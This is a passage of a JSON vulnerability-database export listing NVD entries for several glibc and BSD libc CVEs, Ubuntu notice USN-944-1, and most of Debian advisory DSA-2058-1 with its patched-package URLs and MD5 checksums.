"AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0830"], "modified": "2017-08-17T01:32:00", "cpe": ["cpe:/a:gnu:glibc:2.3.6", "cpe:/a:gnu:glibc:2.1.3", "cpe:/a:gnu:glibc:2.1.1", "cpe:/a:gnu:glibc:2.3.10", "cpe:/a:gnu:glibc:2.2", "cpe:/a:gnu:glibc:2.0.3", "cpe:/a:gnu:glibc:2.3.3", "cpe:/a:gnu:glibc:2.1.2", "cpe:/a:gnu:glibc:2.9", "cpe:/a:gnu:glibc:2.1.1.6", "cpe:/a:gnu:glibc:2.11", "cpe:/a:gnu:glibc:2.3", "cpe:/a:gnu:glibc:2.4", "cpe:/a:gnu:glibc:2.11.1", "cpe:/a:gnu:glibc:2.6", "cpe:/a:gnu:glibc:2.2.2", "cpe:/a:gnu:glibc:2.2.5", "cpe:/a:gnu:glibc:2.2.3", "cpe:/a:gnu:glibc:2.10", "cpe:/a:gnu:glibc:2.6.1", "cpe:/a:gnu:glibc:2.0.2", "cpe:/a:gnu:glibc:2.2.4", "cpe:/a:gnu:glibc:2.10.1", "cpe:/a:gnu:glibc:2.0.4", "cpe:/a:gnu:glibc:2.1", "cpe:/a:gnu:glibc:2.0.6", "cpe:/a:gnu:glibc:2.5.1", "cpe:/a:gnu:glibc:2.0.5", "cpe:/a:gnu:glibc:2.7", "cpe:/a:gnu:glibc:2.0.1", "cpe:/a:gnu:glibc:2.3.2", "cpe:/a:gnu:glibc:2.8", "cpe:/a:gnu:glibc:2.2.1", "cpe:/a:gnu:glibc:2.3.4", "cpe:/a:gnu:glibc:2.1.9", "cpe:/a:gnu:glibc:2.3.5", "cpe:/a:gnu:glibc:2.5", "cpe:/a:gnu:glibc:2.3.1"], "id": "CVE-2010-0830", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0830", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:gnu:glibc:2.8:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.7:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.9:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.11:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.10:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:50:58", "description": "Multiple integer overflows in libc in NetBSD 4.x, FreeBSD 6.x and 7.x, and probably other BSD and Apple Mac OS platforms allow context-dependent attackers to execute arbitrary code via large values of certain integer fields in the format argument to (1) the strfmon function in lib/libc/stdlib/strfmon.c, related to the GET_NUMBER macro; and (2) the printf function, related to left_prec and right_prec.", "edition": 3, "cvss3": {}, "published": "2008-03-27T17:44:00", "title": "CVE-2008-1391", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1391"], "modified": "2018-10-11T20:33:00", "cpe": ["cpe:/o:freebsd:freebsd:7.0_releng", "cpe:/o:freebsd:freebsd:7.0_beta4", "cpe:/o:netbsd:netbsd:4.0", "cpe:/o:freebsd:freebsd:6.0_p5_release", "cpe:/o:freebsd:freebsd:7.0", "cpe:/o:freebsd:freebsd:6.0"], "id": "CVE-2008-1391", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-1391", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:freebsd:freebsd:7.0_releng:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:6.0:release:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:4.0:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:7.0:pre-release:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:6.0:stable:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:7.0_beta4:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:6.0_p5_release:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:57:21", "description": "nis/nss_nis/nis-pwd.c in the GNU C Library (aka glibc or libc6) 2.7 and Embedded GLIBC (EGLIBC) 2.10.2 adds information from the passwd.adjunct.byname map to entries in the passwd map, which allows remote attackers to obtain the encrypted passwords of NIS accounts by calling the getpwnam function.", "edition": 3, "cvss3": {}, "published": "2010-01-14T18:30:00", "title": "CVE-2010-0015", "type": "cve", "cwe": ["CWE-255"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0015"], "modified": "2016-12-07T02:59:00", "cpe": ["cpe:/a:gnu:glibc:2.10.2", "cpe:/a:gnu:glibc:2.7"], "id": "CVE-2010-0015", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0015", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:gnu:glibc:2.7:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.10.2:*:*:*:*:*:*:*"]}], "ubuntu": [{"lastseen": "2020-07-09T00:34:42", "bulletinFamily": "unix", "cvelist": ["CVE-2010-0296", "CVE-2010-0830", "CVE-2009-4880", "CVE-2008-1391"], "description": "Maksymilian Arciemowicz discovered that the GNU C library did not \ncorrectly handle integer overflows in the strfmon function. If a user \nor automated system were tricked into processing a specially crafted \nformat string, a remote attacker could crash applications, leading to \na denial of service. (Ubuntu 10.04 was not affected.) (CVE-2008-1391)\n\nJeff Layton and Dan Rosenberg discovered that the GNU C library did not \ncorrectly handle newlines in the mntent family of functions. If a local \nattacker were able to inject newlines into a mount entry through other \nvulnerable mount helpers, they could disrupt the system or possibly gain \nroot privileges. (CVE-2010-0296)\n\nDan Rosenberg discovered that the GNU C library did not correctly validate \ncertain ELF program headers. If a user or automated system were tricked \ninto verifying a specially crafted ELF program, a remote attacker could \nexecute arbitrary code with user privileges. (CVE-2010-0830)", "edition": 15, "modified": "2010-05-25T00:00:00", "published": "2010-05-25T00:00:00", "id": "USN-944-1", "href": "https://ubuntu.com/security/notices/USN-944-1", "title": "GNU C Library vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2020-11-11T13:24:05", "bulletinFamily": "unix", "cvelist": ["CVE-2009-4881", "CVE-2010-0296", "CVE-2010-0830", "CVE-2009-4880", "CVE-2008-1391"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-2058-1 security@debian.org\nhttp://www.debian.org/security/ Aurelien Jarno\nJune 10, 2010 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : glibc, eglibc\nVulnerability : multiple \nProblem type : remote (local)\nDebian-specific: no\nCVE Id(s) : CVE-2008-1391 CVE-2009-4880, CVE-2009-4881\n CVE-2010-0296 CVE-2010-0830\nDebian Bug : 583908\n\nSeveral vulnerabilities have been discovered in the GNU C Library (aka\nglibc) and its derivatives. The Common Vulnerabilities and Exposures \nproject identifies the following problems:\n\n\nCVE-2008-1391, CVE-2009-4880, CVE-2009-4881\n\nMaksymilian Arciemowicz discovered that the GNU C library did not\ncorrectly handle integer overflows in the strfmon family of \nfunctions. If a user or automated system were tricked into \nprocessing a specially crafted format string, a remote attacker \ncould crash applications, leading to a denial of service.\n\n\nCVE-2010-0296\n\nJeff Layton and Dan Rosenberg discovered that the GNU C library did\nnot correctly handle newlines in the mntent family of functions. If\na local attacker were able to inject newlines into a mount entry \nthrough other vulnerable mount helpers, they could disrupt the \nsystem or possibly gain root privileges.\n\n\nCVE-2010-0830\n\nDan Rosenberg discovered that the GNU C library did not correctly\nvalidate certain ELF program headers. If a user or automated system\nwere tricked into verifying a specially crafted ELF program, a \nremote attacker could execute arbitrary code with user privileges.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.7-18lenny4 of the glibc package.\n\nFor the testing distribution (squeeze), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems has been fixed in\nversion 2.1.11-1 of the eglibc package.\n\nWe recommend that you upgrade your glibc or eglibc packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nDebian (stable)\n- ---------------\n\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/g/glibc/glibc_2.7-18lenny4.diff.gz\n Size/MD5 checksum: 749289 dcb022bd274969ef458933d45b06cca8\n http://security.debian.org/pool/updates/main/g/glibc/glibc_2.7.orig.tar.gz\n Size/MD5 checksum: 15386750 8816fbab13a072c0ccef6640c9d20833\n http://security.debian.org/pool/updates/main/g/glibc/glibc_2.7-18lenny4.dsc\n Size/MD5 checksum: 2564 f5b705bcda1bc7674aa33fb07f417f98\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/g/glibc/glibc-source_2.7-18lenny4_all.deb\n Size/MD5 checksum: 16007014 fd3b316ef085ea9ce71dc67fefd92dc0\n http://security.debian.org/pool/updates/main/g/glibc/locales_2.7-18lenny4_all.deb\n Size/MD5 checksum: 4488186 b9beabe612fbfb014faadef6543e7fab\n http://security.debian.org/pool/updates/main/g/glibc/glibc-doc_2.7-18lenny4_all.deb\n Size/MD5 checksum: 1629166 da396340195ba0214d1d7827ed225341\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-pic_2.7-18lenny4_alpha.deb\n Size/MD5 checksum: 1769494 7082c894a96d6fdc009e15c7773c3108\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-dbg_2.7-18lenny4_alpha.deb\n Size/MD5 checksum: 5716658 7ab5b5510afdbeb0e20ccc2ae1df1778\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny4_alpha.udeb\n Size/MD5 checksum: 18210 e65e4f7d9f55c3e6974fe2112ed076a2\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-dev_2.7-18lenny4_alpha.deb\n Size/MD5 checksum: 3029160 d05c22d8263423dbc334a60c04acec89\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny4_alpha.udeb\n Size/MD5 checksum: 10600 c6af958e690622f8a204ed1401f44ce9\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1_2.7-18lenny4_alpha.deb\n Size/MD5 checksum: 5184660 a1f37830cb0ae5ee79bf479cc92094e4\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-prof_2.7-18lenny4_alpha.deb\n Size/MD5 checksum: 2491830 e3e70cb621bd954acb41700e7fb00fba\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny4_alpha.deb\n Size/MD5 checksum: 177484 c350540ea1beb15e5a49b39a72a4d230\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-alphaev67_2.7-18lenny4_alpha.deb\n Size/MD5 checksum: 1621366 d77b66d4fa5900d12a756c808d61ce5d\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny4_alpha.deb\n Size/MD5 checksum: 2787424 6f6d688cc842bd300026c5dd419eeb4f\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-udeb_2.7-18lenny4_alpha.udeb\n Size/MD5 checksum: 1264256 0e6f61da8287a1be45e8f40f659d4200\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-i386_2.7-18lenny4_amd64.deb\n Size/MD5 checksum: 1460218 4dac6728d0871d40df88dde09416ee53\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny4_amd64.deb\n Size/MD5 checksum: 2666642 e7e12628c095b56bc66bd1fbb7bb9a1a\n http://security.debian.org/pool/updates/main/g/glibc/libc6-i386_2.7-18lenny4_amd64.deb\n Size/MD5 checksum: 3777974 3a08b45214739c18109aa80ee3957c5c\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny4_amd64.deb\n Size/MD5 checksum: 5330838 02ca70069fe3c8186d5b15add9979a31\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny4_amd64.deb\n Size/MD5 checksum: 4961058 f6bc2c4255027b03177a96b48a996e95\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny4_amd64.deb\n Size/MD5 checksum: 1930754 5da596cd4e30c190e635a1a5df518dc3\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny4_amd64.udeb\n Size/MD5 checksum: 9420 64592a07de5985508ffd227334dedf6a\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny4_amd64.deb\n Size/MD5 checksum: 174984 ae190a5aa0266289018cf4beb2a9d2c1\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny4_amd64.deb\n Size/MD5 checksum: 2497244 19d1cb7764663e2a4a40099f446c9821\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny4_amd64.deb\n Size/MD5 checksum: 1465692 37f18d20c182623bcc4d6243b87bce01\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny4_amd64.udeb\n Size/MD5 checksum: 18310 4402c007e74d12c5bb9a76f34d3d9e01\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny4_amd64.udeb\n Size/MD5 checksum: 1106390 bee92ec4cb4c6b41d27e0dd5fe7c729b\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny4_arm.udeb\n Size/MD5 checksum: 14570 0026ea37fbcdf9fa17222cbc242cc603\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny4_arm.deb\n Size/MD5 checksum: 2318296 b46a306ef0c8d2ddc11ad7c64140b92e\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny4_arm.deb\n Size/MD5 checksum: 2605208 9dc14baa617ba8bc86bcc5ce8ae52d9d\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny4_arm.udeb\n Size/MD5 checksum: 1026072 9b075e76c05af156533c59c519143da3\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny4_arm.deb\n Size/MD5 checksum: 5076094 06eb33e2cc52f04919d500520b1e5af7\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny4_arm.deb\n Size/MD5 checksum: 172416 5a5b3848ad34faccefece22ffd9379c7\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny4_arm.deb\n Size/MD5 checksum: 1323960 8164796dcc2838f364958c4e65ceb077\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny4_arm.deb\n Size/MD5 checksum: 4801574 e0ccb2317094ba28772dd70b72e6ae3f\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny4_arm.udeb\n Size/MD5 checksum: 8406 20fe23561274294f4be4900cdc431088\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny4_arm.deb\n Size/MD5 checksum: 1779106 c0242bc449f2f4defab3eed9b0b31fd2\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny4_armel.deb\n Size/MD5 checksum: 5116350 ed5ceee3e916439b534ddb23fbc2ab91\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny4_armel.deb\n Size/MD5 checksum: 1895344 07b2893a5fa7aed15561e410bd93f783\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny4_armel.udeb\n Size/MD5 checksum: 1085156 3157d36d0376d692baa7ab00e3c6c1dd\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny4_armel.deb\n Size/MD5 checksum: 2715326 0f3ebf286794d696b30d3d0b9d56004b\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny4_armel.deb\n Size/MD5 checksum: 1394808 9a074d23294dbe9b9e22f876b6c08ec1\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny4_armel.deb\n Size/MD5 checksum: 171346 c4448e74dfa19735ed94658d3744f2f9\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny4_armel.udeb\n Size/MD5 checksum: 8158 e2264930a0aea372106a0671cea6a40a\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny4_armel.deb\n Size/MD5 checksum: 2433932 9dae6f6e8ec2d493080aa4974e4315df\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny4_armel.deb\n Size/MD5 checksum: 4868196 d06b1acfd00c3af245f72c66d783a0f6\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny4_armel.udeb\n Size/MD5 checksum: 14554 5b61be5f99c9187d6824c280320abaf0\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny4_hppa.udeb\n Size/MD5 checksum: 18530 4e2027a635625f7d44b35e92d1b97975\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny4_hppa.deb\n Size/MD5 checksum: 1959090 a29d92db6c7452bcb6f23f6ca5152318\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny4_hppa.deb\n Size/MD5 checksum: 5946144 a3bf8abc9280a74360567c0ce6de1fc1\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny4_hppa.udeb\n Size/MD5 checksum: 1120558 3f07b7f229d5be460c27ba24dbced23b\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny4_hppa.udeb\n Size/MD5 checksum: 9744 4cef21fdb76ff503717b148a3cc7c9bd\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny4_hppa.deb\n Size/MD5 checksum: 2482508 42d7c830f524cd72e5a5c63260518a25\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny4_hppa.deb\n Size/MD5 checksum: 1471474 12383490d2304d3081b68792fbc6d953\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny4_hppa.deb\n Size/MD5 checksum: 2804918 957d741d58375a8279d9bf1ce5e767ec\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny4_hppa.deb\n Size/MD5 checksum: 5106022 27112fe1d8a4efd12b01f80b52b1cfac\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny4_hppa.deb\n Size/MD5 checksum: 179262 6f7b3d7df37600d2473b9e741194e8a7\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny4_i386.deb\n Size/MD5 checksum: 171844 ba99da60d21b46531cf5a9efc06e4526\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny4_i386.udeb\n Size/MD5 checksum: 823832 185aeb3599a787317757f2a669d38668\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny4_i386.deb\n Size/MD5 checksum: 4550320 b601d6184daca73e71c069dbbec18e3b\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny4_i386.deb\n Size/MD5 checksum: 1154430 8db3712e4227cdb7b93942484eb71cb1\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny4_i386.udeb\n Size/MD5 checksum: 8686 7b75f9cb36a35f3731c879db4b3f1886\n http://security.debian.org/pool/updates/main/g/glibc/libc6-i686_2.7-18lenny4_i386.deb\n Size/MD5 checksum: 1267282 e68152a3929f76782ab9198fb8fbff85\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny4_i386.deb\n Size/MD5 checksum: 3387248 9cdb8401cead8afdd9f3e5da7bf673f8\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny4_i386.deb\n Size/MD5 checksum: 2757192 0fa3be55609c6194d44fb6fd43239b6a\n http://security.debian.org/pool/updates/main/g/glibc/libc6-xen_2.7-18lenny4_i386.deb\n Size/MD5 checksum: 1271974 22b0780c2d4a4d4ae933f445e0593759\n http://security.debian.org/pool/updates/main/g/glibc/libc6-amd64_2.7-18lenny4_i386.deb\n Size/MD5 checksum: 4141064 81f89eabeaa6bf6fbf308fccc08398fd\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny4_i386.deb\n Size/MD5 checksum: 1439560 5d6dfc14194c12ff9f32370c90b820d4\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny4_i386.deb\n Size/MD5 checksum: 5227630 2a291ce43133a023c62ded8981d7e7c1\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-amd64_2.7-18lenny4_i386.deb\n Size/MD5 checksum: 2013794 606bef244b7fd348000fcd4664afe1eb\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny4_i386.udeb\n Size/MD5 checksum: 15430 b2bab9ce9e5cd7d522a35ef7c4833576\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny4_ia64.deb\n Size/MD5 checksum: 2669336 ea49adaffc0d38c758cd51ddbdf4ac2b\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-udeb_2.7-18lenny4_ia64.udeb\n Size/MD5 checksum: 1382700 f4624d9da473c05df2af96b21beca23a\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1_2.7-18lenny4_ia64.deb\n Size/MD5 checksum: 5631150 20c99e91f17e0807eea7a9105c967c74\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-dbg_2.7-18lenny4_ia64.deb\n Size/MD5 checksum: 6265268 3b4d57d487312e1469b326d97d5adc43\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny4_ia64.udeb\n Size/MD5 checksum: 12938 f3624c78267bff32219a2e9f77aa4c6d\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-dev_2.7-18lenny4_ia64.deb\n Size/MD5 checksum: 3234170 ad0e1341214cc691f094484c1809f4eb\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-prof_2.7-18lenny4_ia64.deb\n Size/MD5 checksum: 2690204 30f4c9e4a601253b0e3879bec11b5be4\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny4_ia64.deb\n Size/MD5 checksum: 197936 eba3b4d41c214d32a50c100c823f62c6\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny4_ia64.udeb\n Size/MD5 checksum: 22610 ed1cb78c022f4c8410fc9fbb11a5b024\n http://security.debian.org/pool/updates/main/g/glibc/libc6.1-pic_2.7-18lenny4_ia64.deb\n Size/MD5 checksum: 1743334 afafc27db97fae6af8475335ccb7ecce\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/g/glibc/libc6-prof_2.7-18lenny4_mips.deb\n Size/MD5 checksum: 2083026 997c153a4764dd0b4df5c49516448fe1\n http://security.debian.org/pool/updates/main/g/glibc/libc6-udeb_2.7-18lenny4_mips.udeb\n Size/MD5 checksum: 1075286 7a0b1d333b7f2845cd696b23176e4086\n http://security.debian.org/pool/updates/main/g/glibc/locales-all_2.7-18lenny4_mips.deb\n Size/MD5 checksum: 2774510 91ee6ad39f8cb4299351725c34834f3c\n http://security.debian.org/pool/updates/main/g/glibc/libnss-dns-udeb_2.7-18lenny4_mips.udeb\n Size/MD5 checksum: 8900 05e3412e81e41dba932012299ad1c6b9\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-mips64_2.7-18lenny4_mips.deb\n Size/MD5 checksum: 2502016 1b9f1b03137d28d412efeccfabfc129e\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev_2.7-18lenny4_mips.deb\n Size/MD5 checksum: 2634372 4d64360c5b1d1574bafbd1c1e2ebd37b\n http://security.debian.org/pool/updates/main/g/glibc/nscd_2.7-18lenny4_mips.deb\n Size/MD5 checksum: 173274 dd0b16d480f6caf243a78c86fd2881e9\n http://security.debian.org/pool/updates/main/g/glibc/libc6-mipsn32_2.7-18lenny4_mips.deb\n Size/MD5 checksum: 9232740 264af461f35baac3c8d47e3ea1aa94dc\n http://security.debian.org/pool/updates/main/g/glibc/libc6-mips64_2.7-18lenny4_mips.deb\n Size/MD5 checksum: 4355348 8bcc7566fb3dc39b290340b530db38e6\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dbg_2.7-18lenny4_mips.deb\n Size/MD5 checksum: 5618994 9ed756a5187a9f2b78cd9c3f4c302b66\n http://security.debian.org/pool/updates/main/g/glibc/libc6-dev-mipsn32_2.7-18lenny4_mips.deb\n Size/MD5 checksum: 2360594 1715033754e2c0cb881cf80dc14f2353\n http://security.debian.org/pool/updates/main/g/glibc/libnss-files-udeb_2.7-18lenny4_mips.udeb\n Size/MD5 checksum: 15268 b424520237d4ed24e449cb84eb35d533\n http://security.debian.org/pool/updates/main/g/glibc/libc6-pic_2.7-18lenny4_mips.deb\n Size/MD5 checksum: 1497378 5674b015f009c8df673e8efc2cb0df59\n http://security.debian.org/pool/updates/main/g/glibc/libc6_2.7-18lenny4_mips.deb\n Size/MD5 checksum: 4965718 5a54c66a2204cbb250359f1f883653da\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/g/glibc/libc6-mips64_2.7-18lenny4_mipsel.deb\n 